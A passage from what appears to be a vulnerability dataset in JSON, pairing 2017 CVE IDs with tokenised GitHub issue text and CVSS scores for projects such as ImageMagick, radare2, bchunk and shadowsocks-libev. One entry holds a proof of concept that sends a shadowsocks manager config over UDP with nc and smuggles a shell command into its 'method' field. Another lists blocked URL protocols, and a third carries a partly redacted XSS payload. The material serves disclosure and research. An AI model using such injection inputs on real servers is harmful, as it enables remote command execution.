  9628. "description": "Blacklist couple more types for deserialization. (note: follow up on NUMBERTAG Looks like there is at least one other \"well known\" type to block besides NUMBERTAG already added (an impl class for database drivers). Will gather some more details; if appears credible, will add for NUMBERTAG",
  9629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9630. "severity": "CRITICAL",
  9631. "baseScore": 9.8,
  9632. "impactScore": 5.9,
  9633. "exploitabilityScore": 3.9
  9634. },
  9635. {
  9636. "CVE_ID": "CVE-2017-15133",
  9637. "Issue_Url_old": "https://github.com/miekg/dns/issues/627",
  9638. "Issue_Url_new": "https://github.com/miekg/dns/issues/627",
  9639. "Repo_new": "miekg/dns",
  9640. "Issue_Created_At": "2018-01-17T11:17:11Z",
  9641. "description": "CVETAG . CVETAG",
  9642. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9643. "severity": "HIGH",
  9644. "baseScore": 7.5,
  9645. "impactScore": 3.6,
  9646. "exploitabilityScore": 3.9
  9647. },
  9648. {
  9649. "CVE_ID": "CVE-2017-15194",
  9650. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1010",
  9651. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1010",
  9652. "Repo_new": "cacti/cacti",
  9653. "Issue_Created_At": "2017-10-04T13:36:16Z",
  9654. "description": "Path Based Cross Site Scripting (XSS) . Running version NUMBERTAG Had a security scan performed on application and found NUMBERTAG instances of XSS: APITAG vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload.In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. APITAG exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. APITAG all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG",
  9655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9656. "severity": "MEDIUM",
  9657. "baseScore": 6.1,
  9658. "impactScore": 2.7,
  9659. "exploitabilityScore": 2.8
  9660. },
  9661. {
  9662. "CVE_ID": "CVE-2017-15217",
  9663. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/759",
  9664. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/759",
  9665. "Repo_new": "imagemagick/imagemagick",
  9666. "Issue_Created_At": "2017-09-14T23:41:46Z",
  9667. "description": "memory leak in APITAG Here is the ciritical code ERRORTAG It can be solved by this: ERRORTAG Credit: APITAG of venustech",
  9668. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9669. "severity": "MEDIUM",
  9670. "baseScore": 6.5,
  9671. "impactScore": 3.6,
  9672. "exploitabilityScore": 2.8
  9673. },
  9674. {
  9675. "CVE_ID": "CVE-2017-15218",
  9676. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/760",
  9677. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/760",
  9678. "Repo_new": "imagemagick/imagemagick",
  9679. "Issue_Created_At": "2017-09-15T05:55:48Z",
  9680. "description": "memory leak in APITAG Here is the critical code: ERRORTAG",
  9681. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9682. "severity": "MEDIUM",
  9683. "baseScore": 6.5,
  9684. "impactScore": 3.6,
  9685. "exploitabilityScore": 2.8
  9686. },
  9687. {
  9688. "CVE_ID": "CVE-2017-15232",
  9689. "Issue_Url_old": "https://github.com/mozilla/mozjpeg/issues/268",
  9690. "Issue_Url_new": "https://github.com/mozilla/mozjpeg/issues/268",
  9691. "Repo_new": "mozilla/mozjpeg",
  9692. "Issue_Created_At": "2017-09-30T02:36:55Z",
  9693. "description": "NULL Pointer Dereference vulneribility in quantize_ord_dither function of mozjpeg. Command and argument djpeg crop NUMBERTAG onepass dither ordered dct float colors NUMBERTAG targa grayscale outfile o FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  9694. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9695. "severity": "MEDIUM",
  9696. "baseScore": 6.5,
  9697. "impactScore": 3.6,
  9698. "exploitabilityScore": 2.8
  9699. },
  9700. {
  9701. "CVE_ID": "CVE-2017-15277",
  9702. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/592",
  9703. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/592",
  9704. "Repo_new": "imagemagick/imagemagick",
  9705. "Issue_Created_At": "2017-07-21T04:34:43Z",
  9706. "description": "uninitialized image palette in coders/gif.c. Gif coder leaves the palette uninitialized if neither global nor local palette is present in a gif file. If APITAG is used as a library loaded into a process that operates on interesting data, this can cause security consequences. Repro is available at FILETAG ERRORTAG",
  9707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  9708. "severity": "MEDIUM",
  9709. "baseScore": 6.5,
  9710. "impactScore": 3.6,
  9711. "exploitabilityScore": 2.8
  9712. },
  9713. {
  9714. "CVE_ID": "CVE-2017-15281",
  9715. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/832",
  9716. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/832",
  9717. "Repo_new": "imagemagick/imagemagick",
  9718. "Issue_Created_At": "2017-10-09T14:26:17Z",
  9719. "description": "Conditional Statement depends on uninitialized value. Version NUMBERTAG Running APITAG on a malformed input file results in a jump based on an non initialized variable. The hexdump of the input file is: APITAG The relevant Memory Check output is: ERRORTAG The input file causing triggering the issue is attached: FILETAG",
  9720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9721. "severity": "HIGH",
  9722. "baseScore": 8.8,
  9723. "impactScore": 5.9,
  9724. "exploitabilityScore": 2.8
  9725. },
  9726. {
  9727. "CVE_ID": "CVE-2017-15364",
  9728. "Issue_Url_old": "https://github.com/evan/ccsv/issues/15",
  9729. "Issue_Url_new": "https://github.com/evan/ccsv/issues/15",
  9730. "Repo_new": "evan/ccsv",
  9731. "Issue_Created_At": "2017-10-12T22:38:57Z",
  9732. "description": "Double free security issue. When attempting to parse a file with the following bytes, a double free occurs. APITAG Tested on ubuntu, with APITAG . gdb debug: CODETAG gdb output: ERRORTAG",
  9733. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9734. "severity": "MEDIUM",
  9735. "baseScore": 5.5,
  9736. "impactScore": 3.6,
  9737. "exploitabilityScore": 1.8
  9738. },
  9739. {
  9740. "CVE_ID": "CVE-2017-15368",
  9741. "Issue_Url_old": "https://github.com/radare/radare2/issues/8673",
  9742. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8673",
  9743. "Repo_new": "radareorg/radare2",
  9744. "Issue_Created_At": "2017-10-11T08:21:07Z",
  9745. "description": "Stack buffer overflow in APITAG Stack buffer overflow in APITAG Git HEAD: APITAG Faulting file in URLTAG Command: APITAG Valgrind log: ERRORTAG",
  9746. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9747. "severity": "HIGH",
  9748. "baseScore": 7.8,
  9749. "impactScore": 5.9,
  9750. "exploitabilityScore": 1.8
  9751. },
  9752. {
  9753. "CVE_ID": "CVE-2017-15385",
  9754. "Issue_Url_old": "https://github.com/radare/radare2/issues/8685",
  9755. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8685",
  9756. "Repo_new": "radareorg/radare2",
  9757. "Issue_Created_At": "2017-10-13T19:14:49Z",
  9758. "description": "Invalid write in APITAG Invalid write in APITAG Git HEAD: APITAG Faulting file in URLTAG Command: APITAG ASAN: ERRORTAG",
  9759. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9760. "severity": "HIGH",
  9761. "baseScore": 7.8,
  9762. "impactScore": 5.9,
  9763. "exploitabilityScore": 1.8
  9764. },
  9765. {
  9766. "CVE_ID": "CVE-2017-15609",
  9767. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3868",
  9768. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3868",
  9769. "Repo_new": "octopusdeploy/issues",
  9770. "Issue_Created_At": "2017-10-18T03:35:01Z",
  9771. "description": "Sensitive variables can be written in clear text when using Offline Drop targets. Issue See private issue for more details: URLTAG Sensitive variable value is written to variable file as clear text. Offline drop deployments generate two variable JSON files: one for normal variables which are written in clear text, and one for sensitive variables which is encrypted using the Offline Drop Target's encryption password. If any variable is sensitive, Octopus requires any Offline Drop Target to specify a valid encryption password, and any sensitive values will be encrypted into that file. If your project uses complex nested bindings, the resulting values can be treated as non sensitive and written to the clear text variables file. If an attacker can gain access to these offline drop files, they can gain the sensitive data without needing to decrypt it. Affected versions This affects Octopus APITAG up to APITAG , and is fixed in Octopus APITAG . Implemented solution We now use the configuration of the Offline Drop Target as the switch. If the user has configured an encryption password, they have opted in to have all their variables encrypted, regardless of whether there are any sensitive values or not.",
  9772. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  9773. "severity": "HIGH",
  9774. "baseScore": 7.5,
  9775. "impactScore": 3.6,
  9776. "exploitabilityScore": 3.9
  9777. },
  9778. {
  9779. "CVE_ID": "CVE-2017-15610",
  9780. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3869",
  9781. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3869",
  9782. "Repo_new": "octopusdeploy/issues",
  9783. "Issue_Created_At": "2017-10-18T03:45:14Z",
  9784. "description": "Certificate private keys downloadable when guest user has admin rights. Issue See private issue: URLTAG When the special Guest user account is granted the APITAG permission, and Guest Access is enabled for the Octopus Server, an attacker can sign in as the Guest account and export Certificates managed by Octopus, including the private key. We generally recommend the Guest account is not granted these high level permissions, but want to take the extra step to ensure private keys are never leaked to the Guest user account. Affected Versions Octopus APITAG to APITAG . Fixed in Octopus APITAG . Implemented Solution The special Guest account is specifically denied access to export certificates including the private key, even if the Guest account has been granted the APITAG permission. Fixed in URLTAG",
  9785. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  9786. "severity": "MEDIUM",
  9787. "baseScore": 6.5,
  9788. "impactScore": 3.6,
  9789. "exploitabilityScore": 2.8
  9790. },
  9791. {
  9792. "CVE_ID": "CVE-2017-15611",
  9793. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3864",
  9794. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3864",
  9795. "Repo_new": "octopusdeploy/issues",
  9796. "Issue_Created_At": "2017-10-17T04:06:12Z",
  9797. "description": "Further restrict APITAG action to those with APITAG and APITAG permissions. To further reflect what was the intention of the power of APITAG it will now require additional privileges to be granted. Reasoning By inviting a user to an existing team, the user is editing a team, and causing the creation of a user. This would allow them to invite a user to a team with greater privilege than their own. To make it clear they will now require APITAG which makes it more obvious the power of this action.",
  9798. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  9799. "severity": "MEDIUM",
  9800. "baseScore": 6.5,
  9801. "impactScore": 3.6,
  9802. "exploitabilityScore": 2.8
  9803. },
  9804. {
  9805. "CVE_ID": "CVE-2017-15640",
  9806. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/1521",
  9807. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/1521",
  9808. "Repo_new": "phpipam/phpipam",
  9809. "Issue_Created_At": "2017-10-26T08:53:25Z",
  9810. "description": "Cross Site script. payload: /?ip NUMBERTAG EMAILTAG APITAG Utilization method NUMBERTAG the first account password login NUMBERTAG direct copy payload to the domain name back at site Vulnerability location\uff1a Home search box after login Official demo vulnerability replication \uff1a URLTAG",
  9811. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  9812. "severity": "MEDIUM",
  9813. "baseScore": 5.4,
  9814. "impactScore": 2.7,
  9815. "exploitabilityScore": 2.3
  9816. },
  9817. {
  9818. "CVE_ID": "CVE-2017-15806",
  9819. "Issue_Url_old": "https://github.com/zetacomponents/Mail/issues/58",
  9820. "Issue_Url_new": "https://github.com/zetacomponents/mail/issues/58",
  9821. "Repo_new": "zetacomponents/Mail",
  9822. "Issue_Created_At": "2017-10-24T00:40:55Z",
  9823. "description": "CVETAG : Critical RCE vulnerability. A critical remote code execution vulnerability has been discovered in current version. Please contact me at k EMAILTAG for more details.",
  9824. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9825. "severity": "HIGH",
  9826. "baseScore": 8.1,
  9827. "impactScore": 5.9,
  9828. "exploitabilityScore": 2.2
  9829. },
  9830. {
  9831. "CVE_ID": "CVE-2017-15871",
  9832. "Issue_Url_old": "https://github.com/commenthol/serialize-to-js/issues/3",
  9833. "Issue_Url_new": "https://github.com/commenthol/serialize-to-js/issues/3",
  9834. "Repo_new": "commenthol/serialize-to-js",
  9835. "Issue_Created_At": "2017-10-23T12:23:27Z",
  9836. "description": "deserialize method is vulnerable. FILETAG Hi, there is a vulnerability in deserialize method, please see APITAG above.",
  9837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9838. "severity": "HIGH",
  9839. "baseScore": 7.5,
  9840. "impactScore": 3.6,
  9841. "exploitabilityScore": 3.9
  9842. },
  9843. {
  9844. "CVE_ID": "CVE-2017-15924",
  9845. "Issue_Url_old": "https://github.com/shadowsocks/shadowsocks-libev/issues/1734",
  9846. "Issue_Url_new": "https://github.com/shadowsocks/shadowsocks-libev/issues/1734",
  9847. "Repo_new": "shadowsocks/shadowsocks-libev",
  9848. "Issue_Created_At": "2017-10-13T15:04:42Z",
  9849. "description": "Command Execution in ss manager. Overview Severity Rating: High Confirmed Affected Versions NUMBERTAG Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: URLTAG Vector: Local Credit NUMBERTAG D Sec APITAG Niklas Abel Status: Public CVE: not yet assigned Advisory URL: URLTAG Summary and Impact APITAG libev offers local command execution per configuration file or/and additionally, code execution per UDP request on APITAG The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the \"add_server\" function. The function calls APITAG server);\" which returns a string from the parsed configuration. The string gets executed at line NUMBERTAG if (system(cmd NUMBERTAG so if a configuration parameter contains \"||evil command&&\" within the \"method\" parameter, the evil command will get executed. The ss manager uses UDP port NUMBERTAG to get control commands on APITAG By default no authentication is required, although a password can be set with the ' k' parameter. Product Description Shadowsocks libev is a lightweight secured SOCKS5 proxy for embedded devices and low end boxes. The ss manager is meant to control Shadowsocks servers for multiple users, it spawns new servers if needed. It is a port of Shadowsocks created by MENTIONTAG and maintained by MENTIONTAG and MENTIONTAG Proof of Concept As passed configuration requests are getting executed, the following command will create file \"evil\" in /tmp/ on the server: nc u APITAG NUMBERTAG add: {\"server_port NUMBERTAG password\":\"test\", \"method\":\"||touch /tmp/evil||\"} The code is executed through PATHTAG If the configuration file on the file system is manipulated, the code would get executed as soon as a Shadowsocks instance is started from ss manage, as long as the malicious part of the configuration has not been overwritten. Workarounds There is no workaround available, do not use ss manage until a patch is released. About NUMBERTAG D Sec APITAG NUMBERTAG D Sec is a provider of application security services. We focus on application code reviews, design review and security testing NUMBERTAG D Sec APITAG was founded in NUMBERTAG by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline NUMBERTAG Issues found NUMBERTAG endor contacted NUMBERTAG endor contacted, replied to use APITAG for a full disclosure NUMBERTAG endor contacted, asked if the vendor is sure to want a full disclosure NUMBERTAG endor contacted, replied to create a public issue on APITAG NUMBERTAG Created public issues on APITAG",
  9850. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  9851. "severity": "HIGH",
  9852. "baseScore": 7.8,
  9853. "impactScore": 5.9,
  9854. "exploitabilityScore": 1.8
  9855. },
  9856. {
  9857. "CVE_ID": "CVE-2017-15928",
  9858. "Issue_Url_old": "https://github.com/ohler55/ox/issues/194",
  9859. "Issue_Url_new": "https://github.com/ohler55/ox/issues/194",
  9860. "Repo_new": "ohler55/ox",
  9861. "Issue_Created_At": "2017-10-27T03:26:47Z",
  9862. "description": "Seg fault parse_obj. POC file: APITAG crash: ERRORTAG gdb backtrace: ERRORTAG",
  9863. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9864. "severity": "HIGH",
  9865. "baseScore": 7.5,
  9866. "impactScore": 3.6,
  9867. "exploitabilityScore": 3.9
  9868. },
  9869. {
  9870. "CVE_ID": "CVE-2017-15931",
  9871. "Issue_Url_old": "https://github.com/radare/radare2/issues/8731",
  9872. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8731",
  9873. "Repo_new": "radareorg/radare2",
  9874. "Issue_Created_At": "2017-10-23T12:20:07Z",
  9875. "description": "radare2 invalid memory access in r_endian.h. An invalid memory access issue was found in r_endian.h when handling crafted elf files, which may lead to potential attack. PATHTAG PATHTAG v radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a NUMBERTAG commit: APITAG build NUMBERTAG PATHTAG gdb q PATHTAG Reading symbols from PATHTAG (gdb) r q c ia ./radare2 sigsegv r endian NUMBERTAG poc Starting program: PATHTAG q c ia ./radare2 sigsegv r endian NUMBERTAG poc FILETAG",
  9876. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9877. "severity": "HIGH",
  9878. "baseScore": 7.8,
  9879. "impactScore": 5.9,
  9880. "exploitabilityScore": 1.8
  9881. },
  9882. {
  9883. "CVE_ID": "CVE-2017-15932",
  9884. "Issue_Url_old": "https://github.com/radare/radare2/issues/8743",
  9885. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8743",
  9886. "Repo_new": "radareorg/radare2",
  9887. "Issue_Created_At": "2017-10-26T06:09:51Z",
  9888. "description": "radare2 invalid memory access in elf.c. A invalid memory access issue was found in radare2 elf.c on NUMBERTAG bit linux when handling crafted efl file. Build information: CODETAG Backtrace: ERRORTAG My enviroment: ERRORTAG A POC file has been attached to reproduce this issue. FILETAG",
  9889. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9890. "severity": "HIGH",
  9891. "baseScore": 7.8,
  9892. "impactScore": 5.9,
  9893. "exploitabilityScore": 1.8
  9894. },
  9895. {
  9896. "CVE_ID": "CVE-2017-15953",
  9897. "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/2",
  9898. "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/2",
  9899. "Repo_new": "extramaster/bchunk",
  9900. "Issue_Created_At": "2017-08-31T09:46:50Z",
  9901. "description": "Heap Buffer Overflow on bchunk NUMBERTAG and NUMBERTAG I discovered an instance of heap buffer overflow bug on bchunk NUMBERTAG and NUMBERTAG This issue was discovered and can be replicated on a NUMBERTAG bit Ubuntu machine, for instance I discovered the issue on APITAG The following is some stack trace information, please kindly advise how and where can I share the full output with more details and also the POC files to replicate the issue: ERRORTAG I have emailed the author a few days ago but I don't think he still maintain the code, since NUMBERTAG was published in NUMBERTAG However, this project's NUMBERTAG was published in NUMBERTAG so I believe that this is still maintained. This seems to be the only active upstream for bchunk. If this is not the right place to report the issue, please kindly point me to the right direction, thanks a lot!",
  9902. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9903. "severity": "MEDIUM",
  9904. "baseScore": 5.5,
  9905. "impactScore": 3.6,
  9906. "exploitabilityScore": 1.8
  9907. },
  9908. {
  9909. "CVE_ID": "CVE-2017-15953",
  9910. "Issue_Url_old": "https://github.com/hessu/bchunk/issues/1",
  9911. "Issue_Url_new": "https://github.com/hessu/bchunk/issues/1",
  9912. "Repo_new": "hessu/bchunk",
  9913. "Issue_Created_At": "2017-11-13T23:41:33Z",
  9914. "description": "CVETAG : heap based buffer overflow and crash when processing a malformed CUE file.. bchunk NUMBERTAG is vulnerable to a heap based buffer overflow and crash when processing a malformed CUE file. Fix committed in APITAG provided by Yegor Timoshenko. Fixed in version NUMBERTAG CVETAG URLTAG",
  9915. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9916. "severity": "MEDIUM",
  9917. "baseScore": 5.5,
  9918. "impactScore": 3.6,
  9919. "exploitabilityScore": 1.8
  9920. },
  9921. {
  9922. "CVE_ID": "CVE-2017-15954",
  9923. "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/3",
  9924. "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/3",
  9925. "Repo_new": "extramaster/bchunk",
  9926. "Issue_Created_At": "2017-09-09T10:54:33Z",
  9927. "description": "Another Heap Buffer Overflow on bchunk NUMBERTAG and NUMBERTAG This issue is a heap related error similar to URLTAG url but when replicated using gdb exploitable, it has a hash value that is different. There were NUMBERTAG different payloads that produces the same hash value as URLTAG url but only NUMBERTAG other payload produces the following hash value, which makes it evident that this heap related error is caused by a different part of the code NUMBERTAG APITAG ERRORTAG NUMBERTAG APITAG ERRORTAG The following is the stack trace output from gdb: ERRORTAG",
  9928. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9929. "severity": "MEDIUM",
  9930. "baseScore": 5.5,
  9931. "impactScore": 3.6,
  9932. "exploitabilityScore": 1.8
  9933. },
  9934. {
  9935. "CVE_ID": "CVE-2017-15955",
  9936. "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/4",
  9937. "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/4",
  9938. "Repo_new": "extramaster/bchunk",
  9939. "Issue_Created_At": "2017-09-09T11:08:37Z",
  9940. "description": "Access violation near NULL on destination operand. I have discovered several malformed cue files that would cause bchunk to run into segmentation fault. With the help of gdb exploitable, it can be determined that there was an access violation near NULL on the destination operand. The following is a full output: ERRORTAG",
  9941. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9942. "severity": "MEDIUM",
  9943. "baseScore": 5.5,
  9944. "impactScore": 3.6,
  9945. "exploitabilityScore": 1.8
  9946. },
  9947. {
  9948. "CVE_ID": "CVE-2017-15955",
  9949. "Issue_Url_old": "https://github.com/hessu/bchunk/issues/2",
  9950. "Issue_Url_new": "https://github.com/hessu/bchunk/issues/2",
  9951. "Repo_new": "hessu/bchunk",
  9952. "Issue_Created_At": "2017-11-13T23:48:47Z",
  9953. "description": "CVETAG : Access violation near NULL on destination operand and crash when processing a malformed CUE file. bchunk NUMBERTAG dies with access violation near NULL on destination operand when processing a malformed CUE file. Fix committed in APITAG provided by Yegor Timoshenko. Fixed in version NUMBERTAG CVETAG URLTAG",
  9954. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9955. "severity": "MEDIUM",
  9956. "baseScore": 5.5,
  9957. "impactScore": 3.6,
  9958. "exploitabilityScore": 1.8
  9959. },
  9960. {
  9961. "CVE_ID": "CVE-2017-16006",
  9962. "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/227",
  9963. "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/227",
  9964. "Repo_new": "jonschlinkert/remarkable",
  9965. "Issue_Created_At": "2016-08-20T17:23:28Z",
  9966. "description": "security hole with data: URLs. If you render the markdown xss APITAG APITAG using remarkable in Firefox, clicking it will run a script on the domain of the page displaying the rendered markup (test on URLTAG which can be a security issue. Do you think we could change the protocol blacklist to instead be a whitelist and only include some of the most common protocols? I realize it's already customizable by overriding APITAG but a more secure default would be nice. If that's too big of a change, \"data:\" should at least be filtered out in addition to javascript: and vbscript:.",
  9967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9968. "severity": "MEDIUM",
  9969. "baseScore": 6.1,
  9970. "impactScore": 2.7,
  9971. "exploitabilityScore": 2.8
  9972. },
  9973. {
  9974. "CVE_ID": "CVE-2017-16009",
  9975. "Issue_Url_old": "https://github.com/ceolter/ag-grid/issues/1287",
  9976. "Issue_Url_new": "https://github.com/ag-grid/ag-grid/issues/1287",
  9977. "Repo_new": "ag-grid/ag-grid",
  9978. "Issue_Created_At": "2016-11-28T21:29:18Z",
  9979. "description": "XSS vulnerability: Angular expression injection . I know that ag grid already covers HTML injection since NUMBERTAG but lately we found out that an XSS attack is still possible with a little bit more work when an application uses angular. It is possible to escape expression sandboxing APITAG URLTAG ) and inject code that can break the application. Are there plans to address this issue eventually?",
  9980. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9981. "severity": "MEDIUM",
  9982. "baseScore": 6.1,
  9983. "impactScore": 2.7,
  9984. "exploitabilityScore": 2.8
  9985. },
  9986. {
  9987. "CVE_ID": "CVE-2017-16013",
  9988. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/3466",
  9989. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/3466",
  9990. "Repo_new": "hapijs/hapi",
  9991. "Issue_Created_At": "2017-03-31T16:37:42Z",
  9992. "description": "Non handling of accept encoding header when the value does not conform to the regex. Greetings, We have been successfully using FILETAG (version APITAG on Node APITAG and Debian Jessie ) in production for a while now. Recently however we encountered strange entries in our logs. Specifically we started seeing a bunch of the following entries: ERRORTAG After much digging we where able to reproduce the issue using the following curl command $ curl X POST ' URLTAG d FILETAG H APITAG Type: application/json\" H \"accept encoding: deflate, gzip;q NUMBERTAG q NUMBERTAG APITAG As is immediately obvious, the APITAG header sent by the client is not correct according to the specification (since the APITAG after the last APITAG doesn't match). That results in the accept library's encoding function returning a Boom object that contains the value APITAG in the message property. It then seems like Hapi is using the Boom object as the actual encoding with ultimately makes the framework fail the following assertion (in APITAG ) ERRORTAG The end result is that the client that initiated the (erroneous) request is left hanging, since the framework never responds. Personally I don't care one bit about the client not receiving a response, however the fact that no response is produced results in various error logs in Internet facing reverse proxies (in the form of timeouts). I could create a PR that fixes this issue, but am hesitant to do so since I don't know what the behavior should be in this case. Should the appropriate response be an HTTP NUMBERTAG response, or something else (like using one of the correctly specified encodings)? It seems to me however that the current (non ) handling of such erroneous requests is not the desired behavior. Regards, George",
  9993. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9994. "severity": "HIGH",
  9995. "baseScore": 7.5,
  9996. "impactScore": 3.6,
  9997. "exploitabilityScore": 3.9
  9998. },
  9999. {
  10000. "CVE_ID": "CVE-2017-16016",
  10001. "Issue_Url_old": "https://github.com/punkave/sanitize-html/issues/100",
  10002. "Issue_Url_new": "https://github.com/apostrophecms/sanitize-html/issues/100",
  10003. "Repo_new": "apostrophecms/sanitize-html",
  10004. "Issue_Created_At": "2016-03-26T10:59:21Z",
  10005. "description": "XSS through APITAG If we allowed at least one APITAG the result is a potential XSS vulnerability. APITAG CODETAG Problem in ontext method URLTAG : ERRORTAG text was already html decoded, by APITAG htmlparser2 setting, so we can break text context and inject custom HTML code",
  10006. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10007. "severity": "MEDIUM",
  10008. "baseScore": 6.1,
  10009. "impactScore": 2.7,
  10010. "exploitabilityScore": 2.8
  10011. },
  10012. {
  10013. "CVE_ID": "CVE-2017-16018",
  10014. "Issue_Url_old": "https://github.com/restify/node-restify/issues/1018",
  10015. "Issue_Url_new": "https://github.com/restify/node-restify/issues/1018",
  10016. "Repo_new": "restify/node-restify",
  10017. "Issue_Created_At": "2016-02-25T11:04:50Z",
  10018. "description": "Cross site scripting error. I tested my restify server with this: URLTAG The returned data contains \" APITAG alert NUMBERTAG APITAG \" which some browsers will execute. Simple solution is to change the ERRORTAG at the end of the APITAG to something like this: callback(new ERRORTAG does not exist', APITAG",
  10019. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10020. "severity": "MEDIUM",
  10021. "baseScore": 6.1,
  10022. "impactScore": 2.7,
  10023. "exploitabilityScore": 2.8
  10024. },
  10025. {
  10026. "CVE_ID": "CVE-2017-16019",
  10027. "Issue_Url_old": "https://github.com/GitbookIO/gitbook/issues/1609",
  10028. "Issue_Url_new": "https://github.com/gitbookio/gitbook/issues/1609",
  10029. "Repo_new": "GitbookIO/gitbook",
  10030. "Issue_Created_At": "2016-11-25T21:37:48Z",
